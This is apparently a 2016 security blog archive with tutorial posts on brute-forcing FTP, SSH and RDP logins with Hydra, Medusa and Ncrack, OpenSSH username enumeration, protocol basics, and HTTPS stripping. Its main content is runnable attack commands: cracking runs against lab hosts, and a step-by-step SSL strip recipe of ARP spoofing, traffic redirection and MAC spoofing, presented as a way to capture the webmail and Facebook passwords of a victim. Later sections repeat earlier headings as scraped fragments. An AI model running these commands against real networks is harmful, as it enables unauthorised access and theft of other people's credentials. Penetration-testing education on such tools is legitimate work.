Introduction to Cyber Security: March 2016

Wednesday, 30 March 2016

Attacking sql servers

MEDUSA

Medusa is an alternative to Hydra and is a really fast password cracking tool. It is a parallel brute force tool just like Hydra. However, it is much more stable and faster than Hydra because it uses “Pthread,” meaning that it won’t necessarily duplicate the information, whereas Hydra uses “fork” for parallel processing. To know more about why Medusa is better, you can refer to its official documentation, the link of which is given in the following.

BASIC SYNTAX

To check for available options in Medusa, we will execute “Medusa” command without parameters. As you can see from the screenshot, we need four parameters in order to run Medusa.
–h = Hostname to attack
–u = Username to attack
–P = Password file
–M = Service to attack

OPENSSH USERNAME DISCOVERY BUG

In the following example, we will use Medusa to crack the SSH password, but before that, we will use an OpenSSH username discovery bug to gather a valid username. OpenSSH is one of the most widely used software for providing encrypted communications over the network. In order to perform a more efficient brute force attack, it’s necessary for a penetration tester to know existing usernames. With SSH, there is a small trick that was brought to attention recently by a security researcher at “cureblog.de”.
The problem with Open-SSH is that it checks if the user exists even before it validates the
password. So, supplying a password with large length of data causes it to go very slow thus inducing the long delay of check. Summing it up, when supplying a password with a large length, if a username exists, the delay is high, and if a username does not exist, the delay is low. A security researcher, Tyler Borland, has written a python script to automate this process.
The script is available at
https://code.google.com/p/multiproc-openssh-username-bruteforce/source/browse/ssh_user_
enum.py
Note: Also, the bug does not always work and at the time of writing, it’s not known under what exact conditions the bug works.

USAGE

The usage is extremely simple. Here is the basic syntax, which would check if a username with root is available or not.
root@root:#./ssh_user_enum.py -user root -Host <iP>

CRACKING SSH WITH MEDUSA

In our previous example, with password cracking, we used Hydra to crack ftp passwords. In this example, we will use Medusa to crack SSH accounts. We will issue the following command to get the job done:
medusa –h 192.168.75.141 –u root –P password.txt –M ssh

After a few attempts, it managed to find the correct password, which was “rafay”. Now, you
can log in to the SSH server using your favorite SSH client such as putty.
Note: Medusa gave us the correct password as it was available in the wordlist, as we put in there for a demonstration.
Documentation:

http://www.foofus.net/~jmk/medusa/medusa.html

NCRACK

Ncrack is one of my favorite tools for password cracking. It is based upon nmap libraries. It comes preinstalled with BackTrack. It can be combined with nmap to yield great results. The only disadvantage I see with this tool is that it supports very few services, namely, FTP, SSH, Telnet, FTP, POP3, SMB, RDP, and VNC.

BASIC SYNTAX

We can execute the “ncrack” command without parameters in the terminal to find out what
parameters are required for using ncrack.
–u = Username to attack
–P = Password file
–p = Port of the service to attack (lowercase p)
–f = Quit cracking after the first credential is found

CRACKING AN RDP WITH NCRACK

It’s funny how I always see the question “How do I crack an RDP?” on multiple hacking/security forums, as the process is quite simple. RDP stands for remote desktop protocol, which is generally used for remote management purposes.
As I have already demonstrated how to crack ftp and ssh with hydra and medusa, we will learn to crack an RDP account with ncrack. But before that, let’s take a look at an interesting case study.

CASE STUDY OF A MORTO WORM

In August 2010, F-secure published an interesting story about a worm named “Morto,” which was dangerously spread via networks across the world. The worm took advantage of people using weak/ default passwords for their RDP log-ins such as administrator, password, and 123456. When Morto found an RDP, it tried a list of default passwords. Once it logged in to an RDP, it started to scan for port MS-Term-Service listening on port 3389 on the local area network, and it used the same password list to connect to it again. In this way, it spread very fast.
Now that you have been made aware of how leaving an RDP with default passwords can be
dangerous for an organization, let us try cracking it with Ncrack.
Command:

ncrack –v –u administrator –P/pentest/passwords/wordlists/darkc0de.lst
rdp://192.168.75.140

The –v is an additional parameter I specified here, which is used for verbosity, followed by
the –u parameter for username, –P for password, and finally rdp:// followed by the IP address of the target. Once our credentials are cracked, we can use rdesktop to log in to the RDP.
Command:

rdesktop –u administrator –p aedis

COMBINING NMAP AND NCRACK FOR OPTIMAL RESULTS

As mentioned before, ncrack can be combined with nmap for more effective results. We have already learnt to output the results in an XML file using oX command from nmap in the scanning post. If you are not familiar with it, go back and review the scanning post.
In this particular example, we will scan our network for all live hosts with open ports within our local network 192.168.75.1/24 and then export the results to ncrack, where it will automatically attempt to crack all the services requiring authentication.
Now, from ncrack, we will execute the following command to brute-force all the network
services requiring authentication.

Note: This will not work for ms-term-service due to a bug in the tool. Therefore, for rdp, you need to try it separately by using the method I explained earlier.
Command:

ncrack –vv –u administrator –P/pentest/passwords/wordlists/darkc0de.lst
–iX/root/Desktop/output.xml –f

ncrack will now start cracking the services that have authentication, leaving out the others. So now you’ve seen how easy it is to combine nmap and ncrack to automate our process.

Sunday, 27 March 2016

Advance Exploiting tools

MEDUSA

BASIC SYNTAX

OPENSSH USERNAME DISCOVERY BUG

USAGE

The usage is extremely simple. Here is the basic syntax, which would check if a username with root is available or not.
root@root:#./ssh_user_enum.py -user root -Host <iP>

CRACKING SSH WITH MEDUSA

http://www.foofus.net/~jmk/medusa/medusa.html

NCRACK

BASIC SYNTAX

CRACKING AN RDP WITH NCRACK

CASE STUDY OF A MORTO WORM

ncrack –v –u administrator –P/pentest/passwords/wordlists/darkc0de.lst
rdp://192.168.75.140

rdesktop –u administrator –p aedis

COMBINING NMAP AND NCRACK FOR OPTIMAL RESULTS

Note: This will not work for ms-term-service due to a bug in the tool. Therefore, for rdp, you need to try it separately by using the method I explained earlier.
Command:

ncrack –vv –u administrator –P/pentest/passwords/wordlists/darkc0de.lst
–iX/root/Desktop/output.xml –f

ncrack will now start cracking the services that have authentication, leaving out the others. So now you’ve seen how easy it is to combine nmap and ncrack to automate our process.

Thursday, 24 March 2016

Attacking network remotely

ATTACKING NETWORK REMOTE SERVICES

In previous chapters, we have learned to enumerate open ports and the corresponding services running upon those ports, as well as assessing the vulnerabilities of the services by various methods. Now it’s time to exploit those vulnerabilities.
In this section, we will learn to use various tools such as Hydra, Medusa, and Ncrack to crack usernames and passwords for various network services such as FTP, SSH, and RDP. Any network service that supports authentication is often using default or weak passwords, which can be easily guessed or cracked via a brute force/dictionary attack. Most penetration testers don’t pay much attention to utilizing brute force attacks. But in my opinion, they are the fastest way to gain access to a remote system if used in an intelligent manner.
However, the downsides of these attacks are that they can disrupt the service or cause denial-of-service. Also, they are easily detected by intrusion detection/prevention devices. Therefore, the opinion in the community is that brute force attacks should be rarely attempted. What my opinion is that although they generate lots of noise and may be ineffective when the passwords are complex, if they are carried out efficiently they could be very useful and may allow an easy penetration into the remote system.
Apart from brute force attacks, we will also discuss various other ways to exploit some network services such as FTP, SMTP, and SQL Server.

OVERVIEW OF BRUTE FORCE ATTACKS

Brute force attack is a process of guessing a password through various techniques. Commonly, brute force attacks are divided into three categories:

TRADITIONAL BRUTE FORCE

In a traditional brute force attack, you will try all the possible combinations to guess the correct password. This process is very usually time consuming; if the password is long, it will take years to brute-force. But if the password is short, it can give quick results. Though there are alternative methods to reduce the time taken to brute-force a password, but still under a normal penetration test this type of attack should be avoided.

DICTIONARY ATTACKS

In a dictionary-based brute force attack, we use a custom wordlist, which contains a list of all possible username and password combinations. It is much faster than traditional brute force attacks and is the recommended approach for penetration tests. The only downside is that if the password is not available in the list, the attack won’t be successful. We have already discussed some tools that can be used to gather password lists from victim’s website in the “Information Gathering Techniques” post. So what we learned in that post will start to make sense now.

HYBRID ATTACKS

Hybrid brute force attacks are a combination of both traditional brute force attack and dictionary-based attack. The idea behind a hybrid attack is that it will apply a brute force attack on the dictionary list. An example of this type of attack is the following:

A university has set up a password policy where the password is their “first name” followed by their date of birth. For example, my first name is “Rafay” and my date of birth is February 5, 1993; therefore, my password would be “Rafay521993.” In this case, neither traditional brute force nor dictionary attack would be effective, but the hybrid attack would be.

COMMON TARGET PROTOCOLS

Though there are lots of protocols that we can target, we will commonly come across only the following network protocols/services:

FTP
SSH
SMB
SMTP
HTTP
RDP
VNC
MySQL
MS SQL

Generally, if you are trying to crack any one of these services, the methodology will be the same. All you would need to do is change a few parameters within the tools.

TOOLS OF THE TRADE

There are several tools that could be used for cracking network remote services, and each of them has its own pros and cons depending upon what protocols you are targeting. Let’s take a look at them one by one.

THC HYDRA

THC hydra is one of the oldest password cracking tools developed by “The Hackers Community.” By far, Hydra has the most protocol coverage than any other password cracking tool as per my knowledge, and it is available for almost all the modern operating systems. I use hydra most of the times for my penetration tests. The only thing I do not use it for brute-forcing HTTP authentication, because there are better tools for it, which we will discuss in the “Web Hacking” post.

BASIC SYNTAX FOR HYDRA

Hydra comes preloaded with a username/password list. We can predefine a username or a username list; the choice is ours. Alternatively, we can use our own custom password list to increase the chances of success. The very first choice would be to use top 100 or 1000 worsed passwords.
A collection of good passwords list can be found at packetstorm(http://packetstormsecurity.com/Crackers/wordlists/). Here is the basic syntax for hydra to brute-force a service.

EXAMPLE WITH USERNAME SET TO “ADMINISTRATOR”

Hydra –L administrator –P password.txt <target ip > <service>

EXAMPLE WITH USERNAME SET TO USERNAME LIST

Hydra –L users.txt –P password.txt <target ip > <service>

Note: We need to define the location of the username/password list file for hydra to work.
Cracking Services with Hydra
Let’s start by cracking an ftp password with hydra, which is one of the most commonly found services. For that, we need an ftp service to be running on the target. Consider the target machine having an IP address of 192.168.75.40.
By performing a simple port scan with nmap we figure out that the target machine is running an FTP server at port 21.

Looking at the other services such as Ms-term-serv and Netbios, we can conclude that the FTP server is being run on the Windows operating system which has the username “administrator” by default. (We can also verify it by performing an OS detection with nmap) So we can specify the username as “administrator” in hydra, which can save us some time, but it’s recommended that you use a wordlist.
Now in order to use hydra to brute-force the ftp password, we need to issue the following
command:
hydra –l administrator –P/pentest/passwords/wordlist/darkcode.lst 192.168.75.140 ftp

The command is very simple. We have specified the username as “administrator” followed by the –P parameter and the location where the wordlist is located. In BackTrack, the default list is located in the /pentest/passwords/wordlist/ directory.
Notice that hydra has managed to find the password: “aedis”. While performing this brute
force attack, a huge traffic was noticed on the server end, and from the ftp logs, we could see hydra in action, where it has left a huge log of presence.

These brute force attacks are not recommended. Now that we know the username and the password for the ftp server, we can try logging in. Type in “ftp” followed by the server name. It will ask for username and password. After entering it, we will be able to log in to the FTP server, where we can issue further commands.

In a similar manner, we can use Hydra to brute-force other services such as SSH, SMB,
and RDP. The method for cracking a webform is a bit different; however, there are much better tools to do it than Hydra, which we will discuss when we reach the “Web Hacking post”

HYDRA GUI

For all GUI fans, there is a GUI version of Hydra, which is available by default in BackTrack. All you need to do is to type “Xhydra” or “HydraGTK” from the command line to explore it.

Monday, 21 March 2016

Introduction to remote exploitation

Finally, we’ve come to the exploitation part. We can now use the knowledge acquired so far to gain access to the target machine. Exploitation can be both server side and client side. Server side exploitation consists in having a direct contact with the server, and it does not involve any user interaction. Client side exploitation, on the other hand, is where you directly engage with the target in order to exploit it.
Server side exploitation will be the focus of this post. The main goal of this chapter is to familiarize the audience with the methodologies that can be used to hack into a target. The following topics will be covered:

1. Understanding the network protocols
2. Attacking network remote services
3. Introduction to Metasploit
4. Reconnaissance with Metasploit
5. Exploiting the local/remote target with Metasploit
6. Introducing to Armitage
7. Exploiting local/remote target with Metasploit

UNDERSTANDING NETWORK PROTOCOLS

Having a solid introduction about network protocols is fundamental in the server exploitation phase; you just cannot attack a protocol without knowing how it works. I will not be explaining the ins and outs of every protocol because there are good resources available where you can learn about them, so I don’t need to reinvent the wheel. However, in this post, I will give a brief introduction to network protocols.
As a penetration tester, most of the times, you would come across only three protocols:
1. TCP (Transmission Control Protocol)
2. UDP (User Datagram Protocol)
3. ICMP (Internet Control Messaging Protocol)

TRANSMISSION CONTROL PROTOCOL

Most of the Internet’s traffic is based upon TCP since it guarantees a reliable communication unlike UDP. Most of the protocols that we encounter in our daily lives are based upon TCP. Common examples are FTP, SMTP, Telnet, and HTTP.
TCP is used whenever we need to perform a reliable communication between a client and
a server. TCP performs a reliable communication via the three-way handshake.

USER DATAGRAM PROTOCOL

UDP is the exact opposite of TCP. It is used for faster communications. An example would be for video streaming, such as Skype (VOIP) communication. The advantage of this protocol over TCP is that it’s much faster and efficient. The disadvantage of UDP is that it does not guarantee that the packet will reach the destination, since it does not perform the three-way handshake, thus causing reliability issues. Some of the common UDP protocols that we will run into as a penetration tester are DNS and SQL Server.

INTERNET CONTROL MESSAGING PROTOCOL

ICMP runs upon layer 3 (network layer) of the OSI model, unlike TCP and UDP, which runs
upon layer 4. The protocol was developed for troubleshooting error messages on a network. It is a connectionless protocol, which means that it gives us no guarantee that the packet will reach the destination. Common applications that use ICMP are “Ping” and “Traceroute.” I have discussed both of them in great detail in the “Information Gathering Techniques” post.

SERVER PROTOCOLS

In this module, we will be attacking server protocols, but as mentioned earlier, first we need to understand how they work. All server protocols are divided into two basic categories:
1. Text-based protocols
2. Binary protocols

TEXT-BASED PROTOCOLS (IMPORTANT)

Text-based protocols are human readable protocols, and this is where you, as a penetration tester, need to spend most of your time as they are very easy to understand. Common examples of text-based protocols are HTTP, FTP, and SMTP.

BINARY PROTOCOLS

Binary protocols are not human readable and are very difficult to understand; they are designed for efficiency across the wire. As a penetration tester, our primary focus would be on text/ASCII- based protocols, not binary protocols.
So let’s talk about some of the popular text-based protocols such as FTP, HTTP, and SMTP.

FTP

FTP stands for File Transfer Protocol; it runs on port 21. FTP is commonly used for uploading/downloading files from a server. FTP, in my opinion, is the weakest link in a network because it’s unencrypted, meaning that anybody on a local network can use a network sniffer to capture all the communication. The following image shows the Wireshark capture when I was trying to log in to an FTP server. The username was set to “username” and the password to “password”, as you can clearly see, the username and the password are unencrypted and sent in plain text.

Also, there are some FTP servers that allow anonymous log-ins and are often not updated/
patched, making it easier for an attacker to compromise them.

SMTP

SMTP stands for Simple Mail Transfer Protocol. It runs on port 25. It is used in most of the mailing servers nowadays. As a penetration tester, we will encounter SMTP a lot as it’s always exposed on the Internet and would mostly contain sensitive information.

HTTP

You open up your browser, type a URL into the address bar, and connect to the website. The protocol you are using to do this is HTTP. It runs upon port 80. It’s a fundamental of the web.

RESOURCES

http://www.networksorcery.com/enp/default1101.htm
http://www.networksorcery.com/enp/protocol/http.htm
http://www.networksorcery.com/enp/protocol/smtp.htm
http://www.networksorcery.com/enp/protocol/ftp.htm

Saturday, 19 March 2016

SSL strip

SSL STRIP: STRIPPING HTTPS TRAFFIC

So far, we have only discussed capturing the insecure http traffic, but not secure connections like https. For this, a tool called SSL strip really comes in handy. This tool is helpful even for websites that switch between https and http. The way it works is it replaces all the https links with http links and remembers the change.
It also strips any secure cookie that it sees in the cookie field inside the http request. Secure
cookies instruct the browser to only transmit it over https. In this way, we are also able to capture cookies. In order for the page look legit, it also replaces the favicon with the
(padlock) icon so that the victim would think that he is on a secure connection.

REQUIREMENTS

In order to run SSL Strip, we should have already implemented the ARP spoofing attack. You can do it with any of the tools we discussed earlier. Also make sure that port forwarding is enabled before performing the ARP spoofing attack.

USAGE

The SSL strip can be found in the /pentest/web/ssltrip directory. Navigate to that directory and execute the following command to get it running.
root@bt:/pentest/web/ssltrip#./sslstrip.py –l 8080

The –l parameter instructs SSL strip to listen on port 8080.
Whenever the victim logs in to his account, say, Facebook, his connection will be forced over http. Hence, we can easily use our favorite packet-capturing tool to capture all the traffic. Alternatively, we can also view the captured traffic inside the sslstrip.log folder, which is located inside the same folder in which the SSL strip is located. Just use your favorite text editor to open the log file.

HTTPS HACKING USING SSL STRIP(COMMANDS)

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080

netstat -nr

fierce -dns bahansen.info

arpspoof -i eth0 -t 192.168.2.87 -r 192.168.2.1

sslstrip -l 8080

more sslstrip.log

————————————————————————————————————————-
2ND METHOD BACKTRACK (SNIFF HTTPS PASSWORDS USING SSL STRIP)

ifconfig wlan0 down

macchanger –mac ::00:22:33:44:55:66 wlan0

ifconfig wlan0 up

echo 1 > /proc/sys/net/ipv4/ip_forward

leafpad /etc/etter.conf (remove # sign in front of redir_command_off in 2 lines.)

ettercap -Tql wlan0 -M arp:remote // // (It shows that how mush hosts added to ssl strip)

iptables -t nat -A PREROUTING -i wlan0 -p tcp –destination-port 80 -j REDIRECT –to-port 10000

sslstrip -a -k -f (Lets see the victim side)

open gmail & yahoo & facebook in victim computer,after opening check hacker pc id and pass is shown in terminal of ssl strip

Wednesday, 30 March 2016

Attacking sql servers

MEDUSA

BASIC SYNTAX

OPENSSH USERNAME DISCOVERY BUG

USAGE

CRACKING SSH WITH MEDUSA

NCRACK

BASIC SYNTAX

CRACKING AN RDP WITH NCRACK

CASE STUDY OF A MORTO WORM

COMBINING NMAP AND NCRACK FOR OPTIMAL RESULTS

Sunday, 27 March 2016

Advance Exploiting tools

MEDUSA

BASIC SYNTAX

OPENSSH USERNAME DISCOVERY BUG

USAGE

CRACKING SSH WITH MEDUSA

NCRACK

BASIC SYNTAX

CRACKING AN RDP WITH NCRACK

CASE STUDY OF A MORTO WORM

COMBINING NMAP AND NCRACK FOR OPTIMAL RESULTS

Thursday, 24 March 2016

Attacking network remotely

ATTACKING NETWORK REMOTE SERVICES

OVERVIEW OF BRUTE FORCE ATTACKS

TRADITIONAL BRUTE FORCE

DICTIONARY ATTACKS

HYBRID ATTACKS

COMMON TARGET PROTOCOLS

TOOLS OF THE TRADE

THC HYDRA

BASIC SYNTAX FOR HYDRA

EXAMPLE WITH USERNAME SET TO “ADMINISTRATOR”

EXAMPLE WITH USERNAME SET TO USERNAME LIST

HYDRA GUI

Monday, 21 March 2016

Introduction to remote exploitation

UNDERSTANDING NETWORK PROTOCOLS

TRANSMISSION CONTROL PROTOCOL

USER DATAGRAM PROTOCOL

INTERNET CONTROL MESSAGING PROTOCOL

SERVER PROTOCOLS

TEXT-BASED PROTOCOLS (IMPORTANT)

BINARY PROTOCOLS

FTP

SMTP

HTTP

FURTHER READING

RESOURCES

Saturday, 19 March 2016

SSL strip

SSL STRIP: STRIPPING HTTPS TRAFFIC

REQUIREMENTS

USAGE

HTTPS HACKING USING SSL STRIP(COMMANDS)

————————————————————————————————————————-2ND METHOD BACKTRACK (SNIFF HTTPS PASSWORDS USING SSL STRIP)

————————————————————————————————————————-
2ND METHOD BACKTRACK (SNIFF HTTPS PASSWORDS USING SSL STRIP)